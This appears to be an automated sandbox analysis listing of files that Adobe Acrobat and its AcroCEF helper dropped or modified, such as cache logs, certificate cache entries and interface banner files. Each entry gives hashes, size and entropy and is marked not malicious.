SHA-512: | 91D7D3C9C1CBC272EA7679EC6FFF3DADEE7C7284636EC5A9CE4A017A6E481B9E61F1279271FB12243FCC4471C70A44A3D9B385E9AD0D9EBF5D5EF9020D28851E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 290 |
Entropy (8bit): | 5.14561211804041 |
Encrypted: | false |
SSDEEP: | 6:iO4qVH8Q+q2PqLTwi2nKuAl9OmbnIFUtSqVHCgZmwsqVHCQVkwOqLTwi2nKuAl91:7nH8Q+v8wZHAahFUtZHCg/LHCQV5TwZC |
MD5: | 6592AA684A95E36F15A50AB300A7BAE4 |
SHA1: | C217C94B263CD377DAE147EDAF71F4C07DBAD490 |
SHA-256: | 96B1F04528369A35A8BEDF472DD3FD11FB2199FFBDC74EDCB0374D8D82F097AB |
SHA-512: | 0C644D470C4FE748D29847C480DEC1407A5A5A7A9BD79C7AD4ABC4DD862F2D58FF56DF3FB406C1E2BCC30D80EAA3A3EB1C26E2D7D5CFBBFE54B0877CA71A8136 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 290 |
Entropy (8bit): | 5.14561211804041 |
Encrypted: | false |
SSDEEP: | 6:iO4qVH8Q+q2PqLTwi2nKuAl9OmbnIFUtSqVHCgZmwsqVHCQVkwOqLTwi2nKuAl91:7nH8Q+v8wZHAahFUtZHCg/LHCQV5TwZC |
MD5: | 6592AA684A95E36F15A50AB300A7BAE4 |
SHA1: | C217C94B263CD377DAE147EDAF71F4C07DBAD490 |
SHA-256: | 96B1F04528369A35A8BEDF472DD3FD11FB2199FFBDC74EDCB0374D8D82F097AB |
SHA-512: | 0C644D470C4FE748D29847C480DEC1407A5A5A7A9BD79C7AD4ABC4DD862F2D58FF56DF3FB406C1E2BCC30D80EAA3A3EB1C26E2D7D5CFBBFE54B0877CA71A8136 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 334 |
Entropy (8bit): | 5.152809169971797 |
Encrypted: | false |
SSDEEP: | 6:iO4qVHkWdL+q2PqLTwi2nKuAl9Ombzo2jMGIFUtSqVHkW0a4XZmwsqVHk/VkwOqP:7nHkJv8wZHAa8uFUtZHk3/LHkt5TwZHA |
MD5: | 4F0A89A1768D33DBC3DBE813E5FDD8DC |
SHA1: | D1725F62E7B261F709B7998FA00873606B3C99FB |
SHA-256: | 8B2DFFECA324DB0995C53D67F04294368E1A30453D9CFCBB2CA2200DA12F8071 |
SHA-512: | 9C3AC5C08047E4A68E0C985B055B8B8856829241FE9FAFF21F94926C4C0A48D6A1F5BA469CC1F7541A9DC2CD116D28759A14420322197C4E6EA4EA266CF85859 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 334 |
Entropy (8bit): | 5.152809169971797 |
Encrypted: | false |
SSDEEP: | 6:iO4qVHkWdL+q2PqLTwi2nKuAl9Ombzo2jMGIFUtSqVHkW0a4XZmwsqVHk/VkwOqP:7nHkJv8wZHAa8uFUtZHk3/LHkt5TwZHA |
MD5: | 4F0A89A1768D33DBC3DBE813E5FDD8DC |
SHA1: | D1725F62E7B261F709B7998FA00873606B3C99FB |
SHA-256: | 8B2DFFECA324DB0995C53D67F04294368E1A30453D9CFCBB2CA2200DA12F8071 |
SHA-512: | 9C3AC5C08047E4A68E0C985B055B8B8856829241FE9FAFF21F94926C4C0A48D6A1F5BA469CC1F7541A9DC2CD116D28759A14420322197C4E6EA4EA266CF85859 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\79569f33-6504-4979-8047-78d08be2d0ce.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.957706799156031 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqAzgsBdOg2HMfcaq3QYiub5P7E4T3y:Y2sRdsb1dMHMu3QYhbt7nby |
MD5: | 9BFB4C01F72882BC9B32DB315AF70582 |
SHA1: | 6EB37407347076512D559C279DFED3EE6F54F369 |
SHA-256: | 62F55C0188A355B5B0F4FCFFF786B554025D0F2A025BDEEBD6B15464E15CA2C2 |
SHA-512: | E17DF31BD47A7FA0CC21156F769D6FD1AF45126DF865510ABB3110ED59DD976B901B272A8388943D35C4A0F8097E36214216AB2737B9FE2CFF89D91B4CA85692 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.957706799156031 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqAzgsBdOg2HMfcaq3QYiub5P7E4T3y:Y2sRdsb1dMHMu3QYhbt7nby |
MD5: | 9BFB4C01F72882BC9B32DB315AF70582 |
SHA1: | 6EB37407347076512D559C279DFED3EE6F54F369 |
SHA-256: | 62F55C0188A355B5B0F4FCFFF786B554025D0F2A025BDEEBD6B15464E15CA2C2 |
SHA-512: | E17DF31BD47A7FA0CC21156F769D6FD1AF45126DF865510ABB3110ED59DD976B901B272A8388943D35C4A0F8097E36214216AB2737B9FE2CFF89D91B4CA85692 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3878 |
Entropy (8bit): | 5.223446248362719 |
Encrypted: | false |
SSDEEP: | 96:GICD8SBCmPAi8j0/8qbGNSwPgGYPx8xRqhm068Oz1FSNdw:1CDLCmPj8j0/8qKgwPHYPx8xemT8Oz15 |
MD5: | 9AD0817F0AFDC01CDE3CF8C50570CE4F |
SHA1: | E3739DFBB4B45EF449D5166EB9416A27AAD3E9E1 |
SHA-256: | 8EC8F31ED53EAF37FBF936416C17DE8CE015C0C175E34E4C34FA6165A0329E44 |
SHA-512: | 1DC36776F532203F647F6CE929C2287115AED6DE2A147F0D159899B66F74C67100CD1778CE758A8731135D130DD9FDA6475BE57183ADE03B382CC3765F5BE3CB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 322 |
Entropy (8bit): | 5.142098207144276 |
Encrypted: | false |
SSDEEP: | 6:iO4qVH+L+q2PqLTwi2nKuAl9OmbzNMxIFUtSqVHyZmwsqVHoiLtVkwOqLTwi2nKA:7nHVv8wZHAa8jFUtZHy/LHoiLT5TwZHP |
MD5: | 3C457B267E17AE0D46AB51ADFCEC19E3 |
SHA1: | FD9714343E098CA775A797E93D55CEEB361370FD |
SHA-256: | 9DA6E912F63A5253892F60C307556075A241625CBE9D9915D70DB5EB9DE77795 |
SHA-512: | E2EF9E0C0DEF8900EB11F99949F00412D5D10B7EC52B96EDD700C10F0A5E8806C1903BEFA51837E00A7997AF4860DC1BCB23A2DA3C3931D7ED32A79E8E3C6E7C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 322 |
Entropy (8bit): | 5.142098207144276 |
Encrypted: | false |
SSDEEP: | 6:iO4qVH+L+q2PqLTwi2nKuAl9OmbzNMxIFUtSqVHyZmwsqVHoiLtVkwOqLTwi2nKA:7nHVv8wZHAa8jFUtZHy/LHoiLT5TwZHP |
MD5: | 3C457B267E17AE0D46AB51ADFCEC19E3 |
SHA1: | FD9714343E098CA775A797E93D55CEEB361370FD |
SHA-256: | 9DA6E912F63A5253892F60C307556075A241625CBE9D9915D70DB5EB9DE77795 |
SHA-512: | E2EF9E0C0DEF8900EB11F99949F00412D5D10B7EC52B96EDD700C10F0A5E8806C1903BEFA51837E00A7997AF4860DC1BCB23A2DA3C3931D7ED32A79E8E3C6E7C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.438177663854891 |
Encrypted: | false |
SSDEEP: | 384:Setci5GJiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:KlurVgazUpUTTGt |
MD5: | 566D3957F649AF670EF4F930D6B19BAB |
SHA1: | 76ECCE8CF09347D6A3AEBB2D7DC9C375533208B8 |
SHA-256: | 27D8ECD54ED59BD61500D4A9C5A27FCBE0AE93E648B20B99E27B642AC5A189AF |
SHA-512: | B86F0C97EB9755D37FC74F6768EF5BDC97591CBE1A7C854EEE0178832AADBDAC61629AECCE3F20B895E00791853F4A710BD57C16FA1E4914830EAFBC49558CC6 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2149436536600633 |
Encrypted: | false |
SSDEEP: | 24:7+tKgB6wKapqLLzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9j:7MKaWiqPmFTIF3XmHjBoGGR+jMz+Lhh |
MD5: | FD7583BDCCC9F2166C383339F71DAE89 |
SHA1: | C76C6AB0B1AC5DB9A25354BF074F670742FB20C4 |
SHA-256: | 6AC54B5023C0842FD16B2F1DC2A3C605E91EF561791DA232F31045A4E49CB70D |
SHA-512: | BC56B50DA16ABF16782B437A227B85244DA6A4CA332DF8CFC8C7611B7F90119B4E1A6D960CFB1F77F5E83CEA033974427DE63AC2BD184072A03F5090676369F8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7425532007658724 |
Encrypted: | false |
SSDEEP: | 3:kkFkl24d/tfllXlE/HT8kZJtNNX8RolJuRdxLlGB9lQRYwpDdt:kKvm/eT82RNMa8RdWBwRd |
MD5: | CF0CAE23C0ED1B90F094CA87DB066668 |
SHA1: | 4FEA68780900972727868299E99401F4BED6BA14 |
SHA-256: | 378C724042BBD52FCA0976790DDF898BCF6E4249754075D46EAA0D7EE920A26A |
SHA-512: | E55300FFE1D2379045B72C08E7C381D0531A01BF06D5E13FF356024681290E4E1A199B3C2FE07E81034B5A98EF45E5D749D6BABFC1B77E7788EF737368120AE3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.242990426783058 |
Encrypted: | false |
SSDEEP: | 6:kKfKL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:nKiDImsLNkPlE99SNxAhUe/3 |
MD5: | F0D35B0955E278D340761DF4F5D10AD1 |
SHA1: | 174F7AB3890CDA6C37D18E5FF00A868985B78369 |
SHA-256: | 0CB20E6130192D65A77B035B2762ABC07922BDB2D596EEED07DE2EB8314A018D |
SHA-512: | 0BF89FC6FB6C98F9DF3E1E09788122D41B03231BFE507F6A4B380C53E86C09ABC6CB0130EFB256B1B513B3808373E03F599F266A14713C0F80539C16A8C636B4 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.360390465108925 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXYQeUBkBiIH4mSg1c2LjcWkHvR0YWE42DoAvJM3g98kUwPeUkwRe9:YvXKXdeUBfILT5LjIPN42sGMbLUkee9 |
MD5: | 35A57F16E82F82D7393F56B42893AFD2 |
SHA1: | 35F06C121554BA2674807B3C40FD180B8AB08798 |
SHA-256: | D7BDFB741AAF4B70B77991CD65D9027867C857DD7FDA4EEB90EF526562031796 |
SHA-512: | 61442FFF27A7F90939DE7A71331F8329944CDD04B7DD0DAB5ED726CC3A103875356F907E95756DAA4EFB6F49AE5EC6676D5D82A07707D9DE834F0C2D245BFB01 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.312437580493944 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXYQeUBkBiIH4mSg1c2LjcWkHvR0YWE42DoAvJfBoTfXpnrPeUkwRe9:YvXKXdeUBfILT5LjIPN42sGWTfXcUke6 |
MD5: | DC6049F543D56CE360C2B2C8FD8C5AA5 |
SHA1: | 4189BFAE7D212E9A0975A06923118B92EFA4641E |
SHA-256: | 847A8FA5D0AB5D8F82D0957B1FFE2D4C9180809A750C3DCC59F1483E74588097 |
SHA-512: | 24CCAB573FAC1AA56E1334D9239F4121D983881E5A9FE5B29169DA152008B68AA2C25902F828ECF5C4FDAE840598D25F1256C768538B4668E2DF0BB3B4B7DB34 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.291258655539542 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXYQeUBkBiIH4mSg1c2LjcWkHvR0YWE42DoAvJfBD2G6UpnrPeUkwRe9:YvXKXdeUBfILT5LjIPN42sGR22cUkee9 |
MD5: | 2E518191435B5F855CA1862F5D7841E5 |
SHA1: | 90102C14398119C56C47A090CA39417F8568AFB9 |
SHA-256: | 219C007E45AFE8AE8FCFAA0054B9839096C6DD5E74D324A2FDCA0BE353D606B1 |
SHA-512: | 411FFF31F962027C204C33F1433443A388A2E37B7D3A310556E6302F39FD4E4638CC2FD17E21760B0A930FEE9673A2FFDABFD43E3324FDA00DF7C6A174D39E30 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.341288184642815 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXYQeUBkBiIH4mSg1c2LjcWkHvR0YWE42DoAvJfPmwrPeUkwRe9:YvXKXdeUBfILT5LjIPN42sGH56Ukee9 |
MD5: | 76406F4970CA8236EF16791747C9D010 |
SHA1: | F3DF8FE6879465B0855A445973282870D6413D22 |
SHA-256: | 41D68F1D65F7FC0E3AA9D4E3E46F969758328DD2EAE11E5913E6308986726688 |
SHA-512: | 9F421004929F09E7B0EB11B103CF059493EEC6B52A1000E2F56DF0905D8255D8566C2F13A1437D3822D7A03C30E44E8C89F73A5AFF6CF2C7B3870C369E5202C8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.693915928653477 |
Encrypted: | false |
SSDEEP: | 24:Yv6Xd1gLT5XIl42JpLgE9cQx8LennAvzBvkn0RCmK8czOCCSr:YvG1gBXeJhgy6SAFv5Ah8cv/r |
MD5: | A8DDD17620EE6380B7B9FEE971815DDD |
SHA1: | 54BBDCCA6A2103B55F2AB8AC0EF1F67C27D791DA |
SHA-256: | 7298CF49751F35D4325A18423A99BD70CFCD9F622739BC2AE57A916D6A7C3E69 |
SHA-512: | D5C7BA6A7DD4DD90864B3B7D9E53DED8ED66E4709C2607AD2A414E74055334347AB4A19BA2F0057F5916C72368FBD59BEC82DC872F3B5F2187F42594D33BF5C7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.312612597605439 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXYQeUBkBiIH4mSg1c2LjcWkHvR0YWE42DoAvJf8dPeUkwRe9:YvXKXdeUBfILT5LjIPN42sGU8Ukee9 |
MD5: | 126B93554D871AFE4E20E1E4E0C9E403 |
SHA1: | 805141CCD23AD122F45C3F8A35C8F94511C7C5B2 |
SHA-256: | B1D6827078E9310B9012BA58610BAC0D8A3290EB96A88F26F564E80F0C8A171A |
SHA-512: | E6320FC1A2A9B5EE90D1B72BF46A2166D055C845B0C03A25B5D79A490BD6E6FF4E7289B68A7558355598FC2F53960FBD1E5691FA49AB39B91BCDAF36A0F7337F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.303108618339541 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXYQeUBkBiIH4mSg1c2LjcWkHvR0YWE42DoAvJfQ1rPeUkwRe9:YvXKXdeUBfILT5LjIPN42sGY16Ukee9 |
MD5: | F51189263CD9EA32B2D069E5FDB2B64D |
SHA1: | F7798E92C361EC702DFF27D990571AAD46410C32 |
SHA-256: | 42ADD784097B571542D4E16CACE274BFCC6C11D1B4C6C215680A04422AF2DDCD |
SHA-512: | 6C3237B5DA977A004AA143B872BB94101828A9F55C7290388257EB6259B3D4D99542F74A0D4F4D38449E409ECC611ED3E205F19CBCF78A6980A30CC5F2206792 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.320845039696452 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXYQeUBkBiIH4mSg1c2LjcWkHvR0YWE42DoAvJfFldPeUkwRe9:YvXKXdeUBfILT5LjIPN42sGz8Ukee9 |
MD5: | 72E975007B105F7C700CCFF6655829CC |
SHA1: | 999556D87FE2088D832F78EEDBD518418100A188 |
SHA-256: | D2E75C39E2CB9C0FC0C781E873F6DEFBB68C26F2B3F6E236F5D5C37EE3A85E76 |
SHA-512: | 550B089289915BBD4CEED0F78B2658DF485237D3EDBE29E9425E6642BE58F25DB869F3254DFA784C74BCD76FF1609F1BC7187730BBF0CC82B0B544969A118984 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.338809988697942 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXYQeUBkBiIH4mSg1c2LjcWkHvR0YWE42DoAvJfzdPeUkwRe9:YvXKXdeUBfILT5LjIPN42sGb8Ukee9 |
MD5: | F2B600D21D327E6627013EC58B631432 |
SHA1: | D7C924A6907F97CAD3D894B9076D45F2DCFED2E6 |
SHA-256: | 1DD77D6F8F2AB3328210E6A7E287A93A8C801077416D06A25A4193A7C345DB7D |
SHA-512: | 8A01FB8124BB1A9EA00BC4C6CCEF97C713C0081981A6ECBBA0740AB90F9438D8ADB43C4E6C4774C11EA86A08DC421F8D9DC8A52B38FC0847A672C8268136D654 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.319251439249631 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXYQeUBkBiIH4mSg1c2LjcWkHvR0YWE42DoAvJfYdPeUkwRe9:YvXKXdeUBfILT5LjIPN42sGg8Ukee9 |
MD5: | 8C0CFA8981B6A82B056D134C6B922A4D |
SHA1: | 6570DCBDA27799C8E1654CDEA4F6D8F93A7AF38F |
SHA-256: | FE9640BB33C9D2BECEA7827E64C200672D57BD044DDE2CEEC64D2E0916289F0C |
SHA-512: | 927916EC45B922BC8C0E007245422C631C31C81130902257E629439B82687A0E7C67E3E34D23975B6643234934900C28C2FFEEBF6F1E70C29DB4B30D6F5652EB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.306222099482571 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXYQeUBkBiIH4mSg1c2LjcWkHvR0YWE42DoAvJf+dPeUkwRe9:YvXKXdeUBfILT5LjIPN42sG28Ukee9 |
MD5: | 170CEAAAE09087E48C1167C0FEA3FF65 |
SHA1: | A46F8F4E7F80FBE2D13D37516A989CA96539E375 |
SHA-256: | 4A14376417BB3A0FBCC87388BD96114B284A2FAD1ABD2C85A9BE358D9E19ADD1 |
SHA-512: | 661674C0C98F49874132DA511341C7F6C049C8053268B4BAA502B93DDD6F852FD1D9184D9C53977D8B6EC36C8E7D6469532C70D90038480AB1CED5764BA60D01 |
Malicious: | false |
Preview: |
